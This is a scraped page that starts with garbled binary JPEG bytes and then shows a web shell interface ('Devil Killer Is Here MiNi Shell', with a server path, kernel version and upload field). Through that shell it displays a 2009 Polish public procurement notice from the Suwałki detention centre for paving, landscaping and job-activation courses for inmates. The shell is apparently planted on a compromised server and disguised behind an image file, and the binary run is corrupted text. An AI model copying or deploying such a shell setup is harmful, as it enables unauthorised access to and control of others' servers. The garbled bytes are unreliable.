JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091019/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091019/181835-N-2009.html

<p class="kh_header"><b>Suwałki: Przedmiotem zamówienia są usługi organizacji kursów przygotowujących do pracy w zawodzie brukarz i ogrodnik terenów zieleni oraz aktywizacji zawodowej dla osób pozbawionych wolności odbywających karę w Areszcie Śledczym w Suwałkach.</b><br>
<b>Numer ogłoszenia: 181835 - 2009; data zamieszczenia: 19.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Suwałkach , ul. Wojska Polskiego 29, 16-400 Suwałki, woj. podlaskie, tel. 087 5651207, faks 087 5650328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są usługi organizacji kursów przygotowujących do pracy w zawodzie brukarz i ogrodnik terenów zieleni oraz aktywizacji zawodowej dla osób pozbawionych wolności odbywających karę w Areszcie Śledczym w Suwałkach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje następujące usługi:

Część I - organizacja kursów przygotowujących do pracy w zawodzie brukarz CPV-80530000-8

Przedmiotem zamówienia jest zorganizowanie dwóch kursów przygotowujących do pracy w zawodzie brukarz dla łącznie 24 osadzonych (równolegle 2 kursy po 12 osób).
Wymagania i warunki realizacji zamówienia stawiane Wykonawcy:
a)	Szkolenie musi odbywać się na terenie Aresztu Śledczego w Suwałkach.
b)	Zamawiający zobowiązuje się zapewnić miejsca do nauki teoretycznej i zajęć praktycznych oraz następujące urządzenia i sprzęt w ramach zajęć praktycznych: gilotyna, szlifierki kątowe, niwelator samopoziomujący, zagęszczarka, elastomer, taczki, szpadle, łopaty, grabie, chwytaki do krawężników, młotki brukarskie, wyciągacz kostki, łomy budowlane, szczotki do zamiatania.
c)	Wykonawca zobowiązany jest zapewnić uprawnionych wykładowców, podręczniki, skrypty i środki dydaktyczne niezbędne do realizacji części teoretycznej kursu oraz instruktorów                                      praktycznej nauki zawodu, wszelkie materiały, preparaty i środki ochrony indywidualnej niezbędne do przeprowadzenia części praktycznej jak również zapewni wykonanie badań lekarskich osadzonych biorących udział w kursie na koszt własny. Koszt materiałów przeznaczonych do praktycznej nauki zawodu  powinien wynosić nie mniej niż 30% oraz nie więcej niż 40 % całkowitej wartości kursu. Wykonawca przedłoży zamawiającemu kopie faktur VAT lub rachunków potwierdzających dostarczenie materiałów do przeprowadzenia praktycznej nauki zawodu w ramach kursu.
d)	Koszty egzaminów dla osób uczestniczących poniesie wykonawca.
e)	Celem szkolenia jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu, oraz nabycie umiejętności zawodowych. Wykonawca przygotuje uczestników kursu do wykonywania pracy w zawodzie brukarza w tym min.: dokumentacja, tyczenie, materiały budowlane, maszyny i narzędzia, przygotowanie frontu pracy, brukowanie.
f)	Szkolenie winno obejmować łącznie 100 godzin (25 godzin zajęć teoretycznych i 75 godzin zajęć praktycznych). Program szkolenia, winien być zgodny z rozporządzeniem Ministra Edukacji i Nauki   z 3 lutego 2006 r. w sprawie kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
g)	Kurs musi zakończyć się wydaniem dokumentu potwierdzającego ukończenia kursu zgodnego z jego programem. Wydane absolwentom kursu dokumenty ukończenia kursu winny zawierać informację o realizowaniu szkolenia w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
h)	Wykonawca ubezpieczy w niezbędnym zakresie (OC, NNW) wszystkich uczestników kursu przed rozpoczęciem zajęć - kopie polis przekaże zamawiającemu.
i)	Realizacja szkolenia powinna odbywać się w oparciu o nowoczesne metody i techniki dydaktyczno - pedagogiczne.
j)	Wykonawca przekaże Beneficjentom Ostatecznym skierowanym przez zamawiającego materiały szkoleniowe umożliwiające prawidłowe przygotowanie się do egzaminu końcowego.
k)	Materiały szkoleniowe oraz dokumenty szkolenia należy oznakować poprzez umieszczenie logo UE i EFS oraz informacji o środkach współfinansowania projektu. Do dokumentów szkolenia należy załączyć pokwitowanie odbioru materiałów szkoleniowych, w którym zostaną wymienione materiały szkoleniowe otrzymane przez uczestników.
l)	Zajęcia będą odbywały się w godz. od 8:30 do 16:30 z przerwą na obiad od 12:30 do 13:30 
m)	Wykonawca zobowiązany jest do przeprowadzenia egzaminu końcowego i wydania uczestnikom kursu, którzy uzyskają z egzaminu ocenę wyższą od niedostatecznej, zaświadczeń o ukończeniu kursu zgodnych z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216 z późn. Zm.)
n)	Wykonawca zobowiązany jest do bieżącej, wewnętrznej kontroli szkolenia mającej na celu podnoszenie jakości szkolenia.
o)	Wykonawcy będzie przysługiwało prawo do wynagrodzenia za faktycznie przeszkoloną ilość osób.
p)	Z tytułu zmniejszenia wielkości zamówienia Wykonawcy nie będą przysługiwały żadne roszczenia finansowe ani prawne. 

Część II- kursy przygotowujące do pracy w zawodzie ogrodnik terenów zieleni CPV -80530000-8

Przedmiotem zamówienia jest zorganizowanie dwóch kursów przygotowujących do pracy w zawodzie ogrodnik terenów zieleni dla łącznie 24 osadzonych (równolegle 2 kursy po 12 osób).
Wymagania i warunki realizacji zamówienia stawiane Wykonawcy:
a)	Szkolenie musi odbywać się na terenie Aresztu Śledczego w Suwałkach.
b)	Zamawiający zobowiązuje się zapewnić miejsca do nauki teoretycznej i zajęć praktycznych oraz następujące urządzenia i sprzęt w ramach zajęć praktycznych: kosiarki spalinowe, wykaszarki spalinowe, glebogryzarka, grabie, opryskiwacz, motyki, nożyce, sekatory, wiadra, taczki, wertykulatory - areatory spalinowe, dmuchawa spalinowa, wiertnica glebowa z osprzętem
c)	Wykonawca zobowiązany jest zapewnić uprawnionych wykładowców, podręczniki, skrypty i środki dydaktyczne niezbędne do realizacji części teoretycznej kursu oraz instruktorów                                      praktycznej nauki zawodu, wszelkie materiały, preparaty i środki ochrony indywidualnej niezbędne do przeprowadzenia części praktycznej jak również zapewni wykonanie badań lekarskich osadzonych biorących udział w kursie na koszt własny. Koszt materiałów przeznaczonych do praktycznej nauki zawodu  powinien wynosić nie mniej niż 30% oraz nie więcej niż 40 % całkowitej wartości kursu. Wykonawca przedłoży zamawiającemu kopie faktur VAT lub rachunków potwierdzających dostarczenie materiałów do przeprowadzenia praktycznej nauki zawodu w ramach kursu.
d)	Koszty egzaminów dla osób uczestniczących poniesie wykonawca.
e)	Celem szkolenia jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu, oraz nabycie umiejętności zawodowych. Wykonawca przygotuje uczestników kursu do wykonywania pracy w zawodzie ogrodnika terenów zieleni w tym m.in.: przygotowanie terenu do prowadzenia robót ziemnych, przygotowanie gleby pod nowe nasadzenia, nawożenie, sadzenie, przycinanie drzew, krzewów, obsadzanie kwietników kwiatami rabatowymi, prace ogrodnicze wykonywane na trawnikach, prace porządkowe na terenach zieleni..
f)	Szkolenie winno obejmować łącznie 110 godzin (40 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych). Program szkolenia, winien być zgodny z rozporządzeniem Ministra Edukacji i Nauki   z 3 lutego 2006 r. w sprawie kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
g)	Kurs musi zakończyć się wydaniem dokumentu potwierdzającego ukończenia kursu zgodnego z jego programem. Wydane absolwentom kursu dokumenty ukończenia kursu winny zawierać informację o realizowaniu szkolenia w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
h)	Wykonawca ubezpieczy w niezbędnym zakresie (OC, NNW) wszystkich uczestników kursu przed rozpoczęciem zajęć - kopie polis przekaże zamawiającemu.
i)	Realizacja szkolenia powinna odbywać się w oparciu o nowoczesne metody i techniki dydaktyczno - pedagogiczne.
j)	Wykonawca przekaże Beneficjentom Ostatecznym skierowanym przez zamawiającego materiały szkoleniowe umożliwiające prawidłowe przygotowanie się do egzaminu końcowego.
k)	Materiały szkoleniowe oraz dokumenty szkolenia należy oznakować poprzez umieszczenie logo UE i EFS oraz informacji o środkach współfinansowania projektu. Do dokumentów szkolenia należy załączyć pokwitowanie odbioru materiałów szkoleniowych, w którym zostaną wymienione materiały szkoleniowe otrzymane przez uczestników.
l)	Zajęcia będą odbywały się w godz. od 8:30 do 16:30 z przerwą na obiad od 12:30 do 13:30
m)	Wykonawca zobowiązany jest do przeprowadzenia egzaminu końcowego i wydania uczestnikom kursu, którzy uzyskają z egzaminu ocenę wyższą od niedostatecznej, zaświadczeń o ukończeniu kursu zgodnych z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216 z późn. Zm.)
n)	Wykonawca zobowiązany jest do bieżącej, wewnętrznej kontroli szkolenia mającej na celu podnoszenie jakości szkolenia.
o)	Wykonawcy będzie przysługiwało prawo do wynagrodzenia za faktycznie przeszkoloną ilość osób.
p)	Z tytułu zmniejszenia wielkości zamówienia Wykonawcy nie będą przysługiwały żadne roszczenia finansowe ani prawne. 

Część III - zajęcia aktywizacji zawodowej - CPV 80570000-0

Przedmiotem zamówienia jest zorganizowanie czterech cykli aktywizacji zawodowej łącznie dla 48 osadzonych (równolegle 4 cykle po 12 osób). 

Wymagania i warunki realizacji zamówienia stawiane Wykonawcy:

a)	Zajęcia odbywać się będą na terenie Aresztu Śledczego w Suwałkach z wykorzystaniem pracowni komputerowo - multimedialnej na 11 stanowisk.
b)	Zajęcia będą odbywały się w godz. od 8:30 do 16:30 z przerwą na obiad od 12:30 do 13:30
c)	Wykonawca zobowiązany jest zapewnić uprawnionych wykładowców, podręczniki, skrypty i środki dydaktyczne niezbędne do realizacji zajęć.
d)	Przewidywana liczba godzin w ramach 1 cyklu Aktywizacji Zawodowej - 10 godzin zajęć grupowych oraz po 2 godziny zajęć indywidualnych na każdego uczestnika. 
e)	Program powinien obejmować, co najmniej następujące tematy:
-  Zajęcia grupowe (planowanie rozwoju kariery zawodowej, metody poszukiwania pracy, pisanie dokumentów aplikacyjnych z wykorzystaniem technik komputerowych, proces rekrutacyjny w tym przygotowanie do rozmowy kwalifikacyjnej),
 - Zajęcia indywidualne (testy, badania predyspozycji, tworzenie indywidualnego planu rozwoju ścieżki zawodowej).
f)	Wykonawca zobowiązany jest do bieżącej, wewnętrznej kontroli szkolenia mającej na celu podnoszenie jakości szkolenia.
g)	Wykonawcy będzie przysługiwało prawo do wynagrodzenia za faktycznie przeszkoloną ilość osób.
h)	Z tytułu zmniejszenia wielkości zamówienia Wykonawcy nie będą przysługiwały żadne roszczenia finansowe ani prawne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą brać udział wykonawcy nie wykluczeni na podstawie art. 24 ust. 1  i 2, spełniający warunki zawarte w art. 22 ust. 1 ustawy - Prawo zamówień publicznych. O udzielenie zamówienia mogą ubiegać się wykonawcy którzy:
a)  posiadają uprawnienia do wykonania określonej działalności  lub czynności, jeżeli  ustawy       nakładają obowiązek posiadania takich uprawnień,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania  zamówienia.
	 c)  znajdują  się w  sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia
d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia
2. Ocena spełnienia warunków dokonywana będzie według formuły spełnia - nie spełnia.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
Ustanawiają wtedy pełnomocnika do reprezentowania  ich w postępowaniu o udzielenie zamówienia     
albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

Wymagania dotyczące wykonawcy stosuje się  odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.       
Jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie, zostanie wybrana, zamawiający  
może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (lub dokument potwierdzony w tym terminie przez organ wydający). Wykonawca zobowiązany jest złożyć dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę (wymaga się, aby wykonawca na każdej zapisanej stronie kserokopii złożył własnoręczny podpis poprzedzony dopiskiem za zgodność). Jeżeli do reprezentowania wykonawcy upoważnione są łącznie dwie lub więcej osób kopie dokumentów muszą być potwierdzone za zgodność z oryginałem przez te osoby.
W przypadku, gdy kserokopia jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, zamawiający ma prawo żądać oryginału lub poświadczonej notarialnie potwierdzonej kopii dokumentu, jeżeli nie może sprawdzić jej prawdziwość w inny sposób. W przypadku, gdy oferta została podpisana przez osobę, której reprezentacja nie wynika z powyższego dokumentu, do oferty należy dołączyć również dokument upoważniający tę osobę do podpisy. 
2)	Oświadczenie, o spełnieniu warunków udziału w postępowaniu.  (załącznik nr 2).
Złożenie przez wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania jest karalne. Zgodnie z art. 24 ust. 2 ustawy Prawo zamówień publicznych spowoduje to wykluczenie wykonawcy z dalszego postępowania.
3) Dokument potwierdzający wpis do Rejestru Instytucji Szkoleniowych WUP wystawiony nie wcześniej niż 2 miesiące przed upływem terminu składania ofert.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy
16-400 Suwałki
ul. Wojska Polskiego 29.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2009 godzina 10:00, miejsce: Areszt Śledczy
16-400 Suwałki
ul. Wojska Polskiego 29.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Projekt I - Działanie 1.3 - Poddziałanie 1.3.4,.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - organizacja kursów przygotowujących do pracy w zawodzie brukarz CPV-80530000-8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie dwóch kursów przygotowujących do pracy w zawodzie brukarz dla łącznie 24 osadzonych (równolegle 2 kursy po 12 osób).
Wymagania i warunki realizacji zamówienia stawiane Wykonawcy:
a)	Szkolenie musi odbywać się na terenie Aresztu Śledczego w Suwałkach.
b)	Zamawiający zobowiązuje się zapewnić miejsca do nauki teoretycznej i zajęć praktycznych oraz następujące urządzenia i sprzęt w ramach zajęć praktycznych: gilotyna, szlifierki kątowe, niwelator samopoziomujący, zagęszczarka, elastomer, taczki, szpadle, łopaty, grabie, chwytaki do krawężników, młotki brukarskie, wyciągacz kostki, łomy budowlane, szczotki do zamiatania.
c)	Wykonawca zobowiązany jest zapewnić uprawnionych wykładowców, podręczniki, skrypty i środki dydaktyczne niezbędne do realizacji części teoretycznej kursu oraz instruktorów                                      praktycznej nauki zawodu, wszelkie materiały, preparaty i środki ochrony indywidualnej niezbędne do przeprowadzenia części praktycznej jak również zapewni wykonanie badań lekarskich osadzonych biorących udział w kursie na koszt własny. Koszt materiałów przeznaczonych do praktycznej nauki zawodu  powinien wynosić nie mniej niż 30% oraz nie więcej niż 40 % całkowitej wartości kursu. Wykonawca przedłoży zamawiającemu kopie faktur VAT lub rachunków potwierdzających dostarczenie materiałów do przeprowadzenia praktycznej nauki zawodu w ramach kursu.
d)	Koszty egzaminów dla osób uczestniczących poniesie wykonawca.
e)	Celem szkolenia jest teoretyczne i praktyczne przygotowanie osób szkolonych zgodnie z tematyką kursu, oraz nabycie umiejętności zawodowych. Wykonawca przygotuje uczestników kursu do wykonywania pracy w zawodzie brukarza w tym min.: dokumentacja, tyczenie, materiały budowlane, maszyny i narzędzia, przygotowanie frontu pracy, brukowanie.
f)	Szkolenie winno obejmować łącznie 100 godzin (25 godzin zajęć teoretycznych i 75 godzin zajęć praktycznych). Program szkolenia, winien być zgodny z rozporządzeniem Ministra Edukacji i Nauki   z 3 lutego 2006 r. w sprawie kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
g)	Kurs musi zakończyć się wydaniem dokumentu potwierdzającego ukończenia kursu zgodnego z jego programem. Wydane absolwentom kursu dokumenty ukończenia kursu winny zawierać informację o realizowaniu szkolenia w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
h)	Wykonawca ubezpieczy w niezbędnym zakresie (OC, NNW) wszystkich uczestników kursu przed rozpoczęciem zajęć - kopie polis przekaże zamawiającemu.
i)	Realizacja szkolenia powinna odbywać się w oparciu o nowoczesne metody i techniki dydaktyczno - pedagogiczne.
j)	Wykonawca przekaże Beneficjentom Ostatecznym skierowanym przez zamawiającego materiały szkoleniowe umożliwiające prawidłowe przygotowanie się do egzaminu końcowego.
k)	Materiały szkoleniowe oraz dokumenty szkolenia należy oznakować poprzez umieszczenie logo UE i EFS oraz informacji o środkach współfinansowania projektu. Do dokumentów szkolenia należy załączyć pokwitowanie odbioru materiałów szkoleniowych, w którym zostaną wymienione materiały szkoleniowe otrzymane przez uczestników.
l)	Zajęcia będą odbywały się w godz. od 8:30 do 16:30 z przerwą na obiad od 12:30 do 13:30 
m)	Wykonawca zobowiązany jest do przeprowadzenia egzaminu końcowego i wydania uczestnikom kursu, którzy uzyskają z egzaminu ocenę wyższą od niedostatecznej, zaświadczeń o ukończeniu kursu zgodnych z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216 z późn. Zm.)
n)	Wykonawca zobowiązany jest do bieżącej, wewnętrznej kontroli szkolenia mającej na celu podnoszenie jakości szkolenia.
o)	Wykonawcy będzie przysługiwało prawo do wynagrodzenia za faktycznie przeszkoloną ilość osób.
p)	Z tytułu zmniejszenia wielkości zamówienia Wykonawcy nie będą przysługiwały żadne roszczenia finansowe ani prawne..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II- kursy przygotowujące do pracy w zawodzie ogrodnik terenów zieleni CPV -80530000-8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie dwóch kursów przygotowujących do pracy w zawodzie ogrodnik terenów zieleni dla łącznie 24 osadzonych (równolegle 2 kursy po 12 osób).
Wymagania i warunki realizacji zamówienia stawiane Wykonawcy:
a)	Szkolenie musi odbywać się na terenie Aresztu Śledczego w Suwałkach.
b)	Zamawiający zobowiązuje się zapewnić miejsca do nauki teoretycznej i zajęć praktycznych oraz następujące urządzenia i sprzęt w ramach zajęć praktycznych: kosiarki spalinowe, wykaszarki spalinowe, glebogryzarka, grabie, opryskiwacz, motyki, nożyce, sekatory, wiadra, taczki, wertykulatory - areatory spalinowe, dmuchawa spalinowa, wiertnica glebowa z osprzętem
c)	Wykonawca zobowiązany jest zapewnić uprawnionych wykładowców, podręczniki, skrypty i środki dydaktyczne niezbędne do realizacji części teoretycznej kursu oraz instruktorów                                      praktycznej nauki zawodu, wszelkie materiały, preparaty i środki ochrony indywidualnej niezbędne do przeprowadzenia części praktycznej jak również zapewni wykonanie badań lekarskich osadzonych biorących udział w kursie na koszt własny. Koszt materiałów przeznaczonych do praktycznej nauki zawodu  powinien wynosić nie mniej niż 30% oraz nie więcej niż 40 % całkowitej wartości kursu. Wykonawca przedłoży zamawiającemu kopie faktur VAT lub rachunków potwierdzających dostarczenie materiałów do przeprowadzenia praktycznej nauki zawodu w ramach kursu.
